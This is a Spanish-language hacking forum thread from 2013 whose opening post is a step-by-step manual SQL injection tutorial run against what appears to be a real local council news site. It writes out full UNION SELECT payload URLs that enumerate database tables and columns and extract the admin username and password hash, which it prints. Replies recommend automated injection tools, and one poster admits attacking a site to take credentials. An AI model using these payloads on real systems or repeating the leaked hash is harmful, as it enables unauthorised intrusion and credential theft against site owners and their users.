Sql Injection manualmente (Matabarras-Morenako)

Iniciado por Matabarras, Julio 13, 2013, 09:36:21 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 13, 2013, 09:36:21 AM


Texto escrito en el video:

Código: php
Bueno soy Morenako-Matabarras y les voy a explicar como se realiza un ataque de Sql injecion manualmente.

En primer lugar vamos a la web a la que vamos a realizar la injección.

http://mostalocalcouncil.com/readnews.php?id=

En mi caso está.

Existe varios comentarios, /* -- #

ya que puede ser que con un comentario funcione y otro no.

y varias formas de realizarla, yo les explicare de una forma sencilla


Miraremos aver si es vulnerable facilmente con la tipica comilla simple.

Vemos que nos da el error así que empezemos.


Empezaremos con un - y una id de noticia el 1

y uniremos ya con +union+select+ o simplemente union select o /**/union/**/select/**/0

Hay diversas formas, con diversos comentarios, bueno.

Ahora lo que tenemos que hacer es añadir números hasta que nos desaparezca el error

Vale a partir de 4 nos ha desaparecido el error.

Entonces, ahora es cuando vamos a buscar las tablas de las basesdedatos.

Lo que haremos sera sustutir por uno de esos números por group_concat(table_name)

Una vez echo eso añadimos al final

+from+information_schema.tables -- - , ya que esto no es a ciegas

utilizamos el comentario -- o -- - al final de la consulta.


Vale aqui nos muestra todas las tablas, para mi la más importante y primera a mirar sera users, una cosa he de decirles

Quizas al sustituir el group_concat(table_name) por otro numero, no aparece nada por ejemplo

Por el 0 no nos aparece nada, si cambiamos el 1 por group_concat(table_name) si y si cambiamos el 2 también, es ir probando.

Bueno ya tenemos la tabla users que queremos mirar, así que vamos a transformar


http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -117,115,101,114,115 

ahora esto lo ponemos por ,.

Vale, la injeccion de momento la tenemos así 

http://mostalocalcouncil.com/readnews.php
?id=-1+union+select+0,1,group_concat(table_name),3,4+from+information_schema.tables -- -

Ahora lo que haremos es cambiar en group_concat(table_name) por group_concat(column_name)

y information_schema.tables por information_schema.columns y añadiremos


http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=char(117,115,101,114,115) -- -

Y aparte de  cambiar eso, hemos añadido +where+table_name=char(aqui el codigo en ascii value que nos dio separado por comillas) -- -

Nos da varias columnas

yo mirare la de username y password
Asi que modificamos la consulta. y en group_concat(colum_name)

Column_name lo cambiamos por las columnas que queremos mirar separandolas por una coma y quitamos todo apartir de information_schema poniendo simplemente el nombre de la tabla, que miramos anteriormente que era USERS

http://mostalocalcouncil.com/readnews.php?id=-1+union+select+0,1,group_concat(username,password),3,4+from+users -- -

admin 68b752263e82b3b1ee1ffe739ee0eec1

Y ya tenemos el usuario y hash de la contraseña 

Si queremos miramos el email tambien, y la id

vemos que su id es 2

Bueno,espero que les aña servido el tutorial y lo hayan entendido

Un cordial saludo

Morenako,Matabarras
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Julio 14, 2013, 04:28:51 AM #1
 ::) buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos :-[ ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•
Julio 14, 2013, 08:35:46 AM #2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
::) buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos :-[ ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•
Debería darte vergüenza decirlo...
Prueba sqlmap.
Twitter: @The_Pr0ph3t
[email protected]
Julio 14, 2013, 09:39:21 AM #3
Respecto a Faquir , sin comentarios cada cual sabra.

No le veo la gracia a usar una herramienta que te lo automatiza todo, se ve que es la moda.

Tampoco veo mal usarla en casos, donde el objetivo es sacar mucha información en poco tiempo.

Aunque ultimamente la gente ataca por que si, sin objetivo ni motivo alguno, pero bueno.

Espero que les haya gustado la explicación y se me equivocado en algo que me lo digan, no e entrado a especificar , porque queria hacerla sencilla y que se entendiera bien.
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.
Julio 15, 2013, 07:50:01 AM #4
Para los que les gusta ir directamente al grano, personalmente recomiendo SQLmap, no tiene interfaz gráfica pero es bastante sencillo de usar, y una herramienta muy potente.
Julio 17, 2013, 09:05:26 PM #5

He utilizado mas de una vez Havij, pero realmente no me gusta realizar inyecciones con herramientas, mi interés es aprender el como funcionan esas herramientas y logran explotar vulnerabilidades.

Excelente explicación, nunca esta demás reforzar el conocimiento.

saludos
Julio 30, 2013, 07:57:35 PM #6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
::) buena data... pero yo soy de los tipicos lammers que le gustan las cosas rapidas con solo un programa., Que recomiendan como el mejor de todos¿?.....el pangolin professional editions, el havij 1.6......o cual¿? yo resien use el pangolin y inyecte una pagina de la cual ya sabia que se podria sacar su password y nick de usuario pero no se porque no se le cargo la data de la base de datos :-[ ahora estoy bajando havij 1.6.....recomiendenme algo que si sirva!!! gracias \☻/ soy nuevo por aca... buen foro •saludos•

Faquir Hola Pues sinceramente si no lo haces de manual intenta con SQLMAP O THEMOLE , Havij no me gusta de nda así que si lo vas a hacer automatizado hazlo con : sqlmap , necesitaras de python ya que la herramienta es desarrollada por python

Sal2
Passion informatic.
Julio 31, 2013, 11:29:39 AM #7
Porque morenako?
Imprimir
Ir Arriba Páginas1
Acciones del Usuario